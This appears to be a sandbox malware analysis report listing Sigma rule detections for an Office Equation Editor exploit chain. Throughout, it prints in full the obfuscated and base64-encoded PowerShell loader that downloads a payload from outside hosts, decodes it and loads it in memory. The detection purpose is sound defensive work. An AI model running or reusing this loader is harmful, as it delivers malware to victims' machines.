[System.Reflection.Assembly]:'+':Load(zYvcommandByt'+'es);zYvvai'+'Method = [dnlib.IO.Home].GetMethod(vfcVAIvfc);zYvvaiMethod.Invoke(zYvnull, @(vfctxt.4544656543mmadambewaaaaaaaaasnof/91.7.861.401//:ptthvfc, vfcdesativadovfc, vfcdesativadovfc, vfcdesativadovfc, vfcMS'+'Buildvfc, vfcdesativadovfc, vfcdesativadovfc,vfcdesativadovfc,vfcdesativad'+'ovfc,v'+'fcdesa'+'tivadovf'+'c,vfcdesat'+'ivadovfc,vfcdesativadovfc,vfc1vfc,vfcdesativadovfc));').REPlAcE('Goa','|').REPlAcE('zYv','$').REPlAcE('vfc',[StRing][Char]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $PsHOMe[4]+$PsHOME[34]+'x') (('zYvimageUrl = vfchttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa'+'_bWo9Reu45t7'+'BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1'+'730945176a0904f vfc;zYvwebClient = New-Ob'+'ject System.Net.WebClient;zYvimageBytes = zYvwebClient.DownloadData(zYvimageUrl);zYvimageText = [System.Text.Encoding]:'+':UTF8.GetString(zYvimageBytes);zYvstartFlag = vfc<<BASE64_START'+'>'+'>vfc;'+'zYvendFlag = vfc<<BASE64_END>>vfc;zYvstartIndex = zYvimageText.IndexOf(zYvstartFlag);zYvendInde'+'x = zYvimageText.IndexO'+'f(zYv'+'endFlag);zYvstartIndex -ge 0 -and zYvendIndex -gt zYvstartIndex;zYvstartIndex += zYvstartFlag.Length;'+'zYvbase64Length = zYvendIndex - zYvstartIndex;zYvbase64Command = zYv'+'imageText.Substring(zYvstartIndex, zYvbase64Lengt'+'h);zYvbase64Reversed = -join'+' (zYvbase64Command.ToCharArray() Goa ForEach-Object { '+'zYv'+'_ })[-1..-(zYvbase64Command.Length)];zYvcommandBytes = [System.Convert]::FromBase64String(zYvbase64Reversed);zYvloadedAssembly = [System.Reflection.Assembly]:'+':Load(zYvcommandByt'+'es);zYvvai'+'Method = [dnlib.IO.Home].GetMethod(vfcVAIvfc);zYvvaiMethod.Invoke(zYvnull, @(vfctxt.454
        Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFBzSE9NZVs0XSskUHNIT01FWzM0XSsneCcpICgoJ3pZdmltYWdlVXJsID0gdmZjaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmknKydsZS9nZXQ/ZmlsZWtleT0yQWEnKydfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMScrJzczMDk0NTE3NmEwOTA0ZiB2ZmM7ell2d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt6WXZpbWFnZUJ5dGVzID0gell2d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh6WXZpbWFnZVVybCk7ell2aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTonKyc6VVRGOC5HZXRTdHJpbmcoell2aW1hZ2VCeXRlcyk7ell2c3RhcnRGbGFnID0gdmZjPDxCQVNFNjRfU1RBUlQnKyc+JysnPnZmYzsnKyd6WXZlbmRGbGFnID0gdmZjPDxCQVNFNjRfRU5EPj52ZmM7ell2c3RhcnRJbmRleCA9IHpZdmltYWdlVGV4dC5JbmRleE9mKHpZdnN0YXJ0RmxhZyk7ell2ZW5kSW5kZScrJ3ggPSB6WXZpbWFnZVRleHQuSW5kZXhPJysnZih6WXYnKydlbmRGbGFnKTt6WXZzdGFydEluZGV4IC1nZSAwIC1hbmQgell2ZW5kSW5kZXggLWd0IHpZdnN0YXJ0SW5kZXg7ell2c3RhcnRJbmRleCArPSB6WXZzdGFydEZsYWcuTGVuZ3RoOycrJ3pZdmJhc2U2NExlbmd0aCA9IHpZdmVuZEluZGV4IC0gell2c3RhcnRJbmRleDt6WXZiYXNlNjRDb21tYW5kID0gell2JysnaW1hZ2VUZXh0LlN1YnN0cmluZyh6WXZzdGFydEluZGV4LCB6WXZiYXNlNjRMZW5ndCcrJ2gpO3pZdmJhc2U2NFJldmVyc2VkID0gLWpvaW4nKycgKHpZdmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBHb2EgRm9yRWFjaC1PYmplY3QgeyAnKyd6WXYnKydfIH0pWy0xLi4tKHpZdmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ell2Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh6WXZiYXNlNjRSZXZlcnNlZCk7ell2bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOicrJzpMb2FkKHpZdmNvbW1hbmRCeXQnKydlcyk7ell2dmFpJysnTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh2ZmNWQUl2ZmMpO3pZdnZhaU1ldGhvZC5JbnZva2Uoell2bnVsbCwgQCh2ZmN0eHQuNDU0NDY1NjU0M21tYWRhbWJld2FhYWFhYWFhYXNub2YvOTEuNy44NjEuNDAxLy86cHR0aHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjTVMnKydCdWlsZHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYyx2ZmNkZXNhdGl2YWRvdmZjLHZmY2Rlc2F0aXZhZCcrJ292ZmMsdicrJ2ZjZGVzYScrJ3RpdmFkb3ZmJysnYyx2ZmNkZXNhdCcrJ2l2YWRvdmZjLHZmY2Rlc2F0aXZhZG92ZmMsdmZjMXZmYyx2ZmNkZXNhdGl2YWRvdmZjKSk7JykuUkVQbEFjRSgnR29hJywnfCcpLlJFUGxBY0UoJ3pZdicsJyQnKS5SRVBsQWNFKCd2ZmMnLFtTdFJpbmddW0NoYXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFBzSE9NZVs0XSskUHNIT01FWzM0XSsneCcpICgoJ3pZdmltYWdlVXJsID0gdmZjaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmknKydsZS9nZXQ/ZmlsZWtleT0yQWEnKydfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMScrJzczMDk0NTE3NmEwOTA0ZiB2ZmM7ell2d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt6WXZpbWFnZUJ5dGVzID0gell2d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh6WXZpbWFnZVVybCk7ell2aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTonKyc6VVRGOC5HZXRTdHJpbmcoell2aW1hZ2VCeXRlcyk7ell2c3RhcnRGbGFnID0gdmZjPDxCQVNFNjRfU1RBUlQn
        Sigma detected: Script Initiated Connection to Non-Local Network
        Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 188.114.97.6, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3588, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49164
        Sigma detected: Suspicious Microsoft Office Child Process
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningmecccmedicallaboratory.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningmecccmedicallaboratory.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3444, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningmecccmedicallaboratory.vbs" , ProcessId: 3588, ProcessName: wscript.exe
        Sigma detected: WScript or CScript Dropper
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningmecccmedicallaboratory.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningmecccmedicallaboratory.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3444, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningmecccmedicallaboratory.vbs" , ProcessId: 3588, ProcessName: wscript.exe
        Sigma detected: Change PowerShell Policies to an Insecure Level
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFBzSE9NZVs0XSskUHNIT01FWzM0XSsneCcpICgoJ3pZdmltYWdlVXJsID0gdmZjaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmknKydsZS9nZXQ/ZmlsZWtleT0yQWEnKydfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMScrJzczMDk0NTE3NmEwOTA0ZiB2ZmM7ell2d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt6WXZpbWFnZUJ5dGVzID0gell2d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh6WXZpbWFnZVVybCk7ell2aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTonKyc6VVRGOC5HZXRTdHJpbmcoell2aW1hZ2VCeXRlcyk7ell2c3RhcnRGbGFnID0gdmZjPDxCQVNFNjRfU1RBUlQnKyc+JysnPnZmYzsnKyd6WXZlbmRGbGFnID0gdmZjPDxCQVNFNjRfRU5EPj52ZmM7ell2c3RhcnRJbmRleCA9IHpZdmltYWdlVGV4dC5JbmRleE9mKHpZdnN0YXJ0RmxhZyk7ell2ZW5kSW5kZScrJ3ggPSB6WXZpbWFnZVRleHQuSW5kZXhPJysnZih6WXYnKydlbmRGbGFnKTt6WXZzdGFydEluZGV4IC1nZSAwIC1hbmQgell2ZW5kSW5kZXggLWd0IHpZdnN0YXJ0SW5kZXg7ell2c3RhcnRJbmRleCArPSB6WXZzdGFydEZsYWcuTGVuZ3RoOycrJ3pZdmJhc2U2NExlbmd0aCA9IHpZdmVuZEluZGV4IC0gell2c3RhcnRJbmRleDt6WXZiYXNlNjRDb21tYW5kID0gell2JysnaW1hZ2VUZXh0LlN1YnN0cmluZyh6WXZzdGFydEluZGV4LCB6WXZiYXNlNjRMZW5ndCcrJ2gpO3pZdmJhc2U2NFJldmVyc2VkID0gLWpvaW4nKycgKHpZdmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBHb2EgRm9yRWFjaC1PYmplY3QgeyAnKyd6WXYnKydfIH0pWy0xLi4tKHpZdmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ell2Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh6WXZiYXNlNjRSZXZlcnNlZCk7ell2bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOicrJzpMb2FkKHpZdmNvbW1hbmRCeXQnKydlcyk7ell2dmFpJysnTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh2ZmNWQUl2ZmMpO3pZdnZhaU1ldGhvZC5JbnZva2Uoell2bnVsbCwgQCh2ZmN0eHQuNDU0NDY1NjU0M21tYWRhbWJld2FhYWFhYWFhYXNub2YvOTEuNy44NjEuNDAxLy86cHR0aHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjTVMnKydCdWlsZHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYyx2ZmNkZXNhdGl2YWRvdmZjLHZmY2Rlc2F0aXZhZCcrJ292ZmMsdicrJ2ZjZGVzYScrJ3RpdmFkb3ZmJysnYyx2ZmNkZXNhdCcrJ2l2YWRvdmZjLHZmY2Rlc2F0aXZhZG92ZmMsdmZjMXZmYyx2ZmNkZXNhdGl2YWRvdmZjKSk7JykuUkVQbEFjRSgnR29hJywnfCcpLlJFUGxBY0UoJ3pZdicsJyQnKS5SRVBsQWNFKCd2ZmMnLFtTdFJpbmddW0NoYXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFBzSE9NZVs0XSskUHNIT01FWzM0XSsneCcpICgoJ3pZdmltYWdlVXJsID0gdmZjaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmknKydsZS9nZXQ/ZmlsZWtleT0yQWEnKydfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMScrJzczMDk0NTE3NmEwOTA0ZiB2ZmM7ell2d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt6WXZpbWFnZUJ5dGVzID0gell2d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh6WXZpbWFnZVVybCk7ell2aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTonKyc6VVRGOC5HZXRTdHJpbmcoell2aW1hZ2VCeXRlcyk7ell2c3RhcnRGbGFnID0gdmZjPDxCQVNFNjRfU1RBUlQn
        Sigma detected: Script Initiated Connection
        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 188.114.97.6, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3588, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49164
        Sigma detected: Usage Of Web Request Commands And Cmdlets
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $PsHOMe[4]+$PsHOME[34]+'x') (('zYvimageUrl = vfchttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa'+'_bWo9Reu45t7'+'BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1'+'730945176a0904f vfc;zYvwebClient = New-Ob'+'ject System.Net.WebClient;zYvimageBytes = zYvwebClient.DownloadData(zYvimageUrl);zYvimageText = [System.Text.Encoding]:'+':UTF8.GetString(zYvimageBytes);zYvstartFlag = vfc<<BASE64_START'+'>'+'>vfc;'+'zYvendFlag = vfc<<BASE64_END>>vfc;zYvstartIndex = zYvimageText.IndexOf(zYvstartFlag);zYvendInde'+'x = zYvimageText.IndexO'+'f(zYv'+'endFlag);zYvstartIndex -ge 0 -and zYvendIndex -gt zYvstartIndex;zYvstartIndex += zYvstartFlag.Length;'+'zYvbase64Length = zYvendIndex - zYvstartIndex;zYvbase64Command = zYv'+'imageText.Substring(zYvstartIndex, zYvbase64Lengt'+'h);zYvbase64Reversed = -join'+' (zYvbase64Command.ToCharArray() Goa ForEach-Object { '+'zYv'+'_ })[-1..-(zYvbase64Command.Length)];zYvcommandBytes = [System.Convert]::FromBase64String(zYvbase64Reversed);zYvloadedAssembly = [System.Reflection.Assembly]:'+':Load(zYvcommandByt'+'es);zYvvai'+'Method = [dnlib.IO.Home].GetMethod(vfcVAIvfc);zYvvaiMethod.Invoke(zYvnull, @(vfctxt.4544656543mmadambewaaaaaaaaasnof/91.7.861.401//:ptthvfc, vfcdesativadovfc, vfcdesativadovfc, vfcdesativadovfc, vfcMS'+'Buildvfc, vfcdesativadovfc, vfcdesativadovfc,vfcdesativadovfc,vfcdesativad'+'ovfc,v'+'fcdesa'+'tivadovf'+'c,vfcdesat'+'ivadovfc,vfcdesativadovfc,vfc1vfc,vfcdesativadovfc));').REPlAcE('Goa','|').REPlAcE('zYv','$').REPlAcE('vfc',[StRing][Char]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $PsHOMe[4]+$PsHOME[34]+'x') (('zYvimageUrl = vfchttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa'+'_bWo9Reu45t7'+'BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1'+'730945176a0904f vfc;zYvwebClient = New-Ob'+'ject System.Net.WebClient;zYvimageBytes = zYvwebClient.DownloadData(zYvimageUrl);zYvimageText = [System.Text.Encoding]:'+':UTF8.GetString(zYvimageBytes);zYvstartFlag = vfc<<BASE64_START'+'>'+'>vfc;'+'zYvendFlag = vfc<<BASE64_END>>vfc;zYvstartIndex = zYvimageText.IndexOf(zYvstartFlag);zYvendInde'+'x = zYvimageText.IndexO'+'f(zYv'+'endFlag);zYvstartIndex -ge 0 -and zYvendIndex -gt zYvstartIndex;zYvstartIndex += zYvstartFlag.Length;'+'zYvbase64Length = zYvendIndex - zYvstartIndex;zYvbase64Command = zYv'+'imageText.Substring(zYvstartIndex, zYvbase64Lengt'+'h);zYvbase64Reversed = -join'+' (zYvbase64Command.ToCharArray() Goa ForEach-Object { '+'zYv'+'_ })[-1..-(zYvbase64Command.Length)];zYvcommandBytes = [System.Convert]::FromBase64String(zYvbase64Reversed);zYvloadedAssembly = [System.Reflection.Assembly]:'+':Load(zYvcommandByt'+'es);zYvvai'+'Method = [dnlib.IO.Home].GetMethod(vfcVAIvfc);zYvvaiMethod.Invoke(zYvnull, @(vfctxt.454
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningmecccmedicallaboratory.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningmecccmedicallaboratory.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3444, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningmecccmedicallaboratory.vbs" , ProcessId: 3588, ProcessName: wscript.exe
        Sigma detected: Modification of IE Registry Settings
        Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3444, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFBzSE9NZVs0XSskUHNIT01FWzM0XSsneCcpICgoJ3pZdmltYWdlVXJsID0gdmZjaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmknKydsZS9nZXQ/ZmlsZWtleT0yQWEnKydfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMScrJzczMDk0NTE3NmEwOTA0ZiB2ZmM7ell2d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt6WXZpbWFnZUJ5dGVzID0gell2d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh6WXZpbWFnZVVybCk7ell2aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTonKyc6VVRGOC5HZXRTdHJpbmcoell2aW1hZ2VCeXRlcyk7ell2c3RhcnRGbGFnID0gdmZjPDxCQVNFNjRfU1RBUlQnKyc+JysnPnZmYzsnKyd6WXZlbmRGbGFnID0gdmZjPDxCQVNFNjRfRU5EPj52ZmM7ell2c3RhcnRJbmRleCA9IHpZdmltYWdlVGV4dC5JbmRleE9mKHpZdnN0YXJ0RmxhZyk7ell2ZW5kSW5kZScrJ3ggPSB6WXZpbWFnZVRleHQuSW5kZXhPJysnZih6WXYnKydlbmRGbGFnKTt6WXZzdGFydEluZGV4IC1nZSAwIC1hbmQgell2ZW5kSW5kZXggLWd0IHpZdnN0YXJ0SW5kZXg7ell2c3RhcnRJbmRleCArPSB6WXZzdGFydEZsYWcuTGVuZ3RoOycrJ3pZdmJhc2U2NExlbmd0aCA9IHpZdmVuZEluZGV4IC0gell2c3RhcnRJbmRleDt6WXZiYXNlNjRDb21tYW5kID0gell2JysnaW1hZ2VUZXh0LlN1YnN0cmluZyh6WXZzdGFydEluZGV4LCB6WXZiYXNlNjRMZW5ndCcrJ2gpO3pZdmJhc2U2NFJldmVyc2VkID0gLWpvaW4nKycgKHpZdmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBHb2EgRm9yRWFjaC1PYmplY3QgeyAnKyd6WXYnKydfIH0pWy0xLi4tKHpZdmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ell2Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh6WXZiYXNlNjRSZXZlcnNlZCk7ell2bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOicrJzpMb2FkKHpZdmNvbW1hbmRCeXQnKydlcyk7ell2dmFpJysnTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh2ZmNWQUl2ZmMpO3pZdnZhaU1ldGhvZC5JbnZva2Uoell2bnVsbCwgQCh2ZmN0eHQuNDU0NDY1NjU0M21tYWRhbWJld2FhYWFhYWFhYXNub2YvOTEuNy44NjEuNDAxLy86cHR0aHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjTVMnKydCdWlsZHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYyx2ZmNkZXNhdGl2YWRvdmZjLHZmY2Rlc2F0aXZhZCcrJ292ZmMsdicrJ2ZjZGVzYScrJ3RpdmFkb3ZmJysnYyx2ZmNkZXNhdCcrJ2l2YWRvdmZjLHZmY2Rlc2F0aXZhZG92ZmMsdmZjMXZmYyx2ZmNkZXNhdGl2YWRvdmZjKSk7JykuUkVQbEFjRSgnR29hJywnfCcpLlJFUGxBY0UoJ3pZdicsJyQnKS5SRVBsQWNFKCd2ZmMnLFtTdFJpbmddW0NoYXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFBzSE9NZVs0XSskUHNIT01FWzM0XSsneCcpICgoJ3pZdmltYWdlVXJsID0gdmZjaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmknKydsZS9nZXQ/ZmlsZWtleT0yQWEnKydfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMScrJzczMDk0NTE3NmEwOTA0ZiB2ZmM7ell2d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt6WXZpbWFnZUJ5dGVzID0gell2d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh6WXZpbWFnZVVybCk7ell2aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTonKyc6VVRGOC5HZXRTdHJpbmcoell2aW1hZ2VCeXRlcyk7ell2c3RhcnRGbGFnID0gdmZjPDxCQVNFNjRfU1RBUlQn
        Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $PsHOMe[4]+$PsHOME[34]+'x') (('zYvimageUrl = vfchttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa'+'_bWo9Reu45t7'+'BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1'+'730945176a0904f vfc;zYvwebClient = New-Ob'+'ject System.Net.WebClient;zYvimageBytes = zYvwebClient.DownloadData(zYvimageUrl);zYvimageText = [System.Text.Encoding]:'+':UTF8.GetString(zYvimageBytes);zYvstartFlag = vfc<<BASE64_START'+'>'+'>vfc;'+'zYvendFlag = vfc<<BASE64_END>>vfc;zYvstartIndex = zYvimageText.IndexOf(zYvstartFlag);zYvendInde'+'x = zYvimageText.IndexO'+'f(zYv'+'endFlag);zYvstartIndex -ge 0 -and zYvendIndex -gt zYvstartIndex;zYvstartIndex += zYvstartFlag.Length;'+'zYvbase64Length = zYvendIndex - zYvstartIndex;zYvbase64Command = zYv'+'imageText.Substring(zYvstartIndex, zYvbase64Lengt'+'h);zYvbase64Reversed = -join'+' (zYvbase64Command.ToCharArray() Goa ForEach-Object { '+'zYv'+'_ })[-1..-(zYvbase64Command.Length)];zYvcommandBytes = [System.Convert]::FromBase64String(zYvbase64Reversed);zYvloadedAssembly = [System.Reflection.Assembly]:'+':Load(zYvcommandByt'+'es);zYvvai'+'Method = [dnlib.IO.Home].GetMethod(vfcVAIvfc);zYvvaiMethod.Invoke(zYvnull, @(vfctxt.4544656543mmadambewaaaaaaaaasnof/91.7.861.401//:ptthvfc, vfcdesativadovfc, vfcdesativadovfc, vfcdesativadovfc, vfcMS'+'Buildvfc, vfcdesativadovfc, 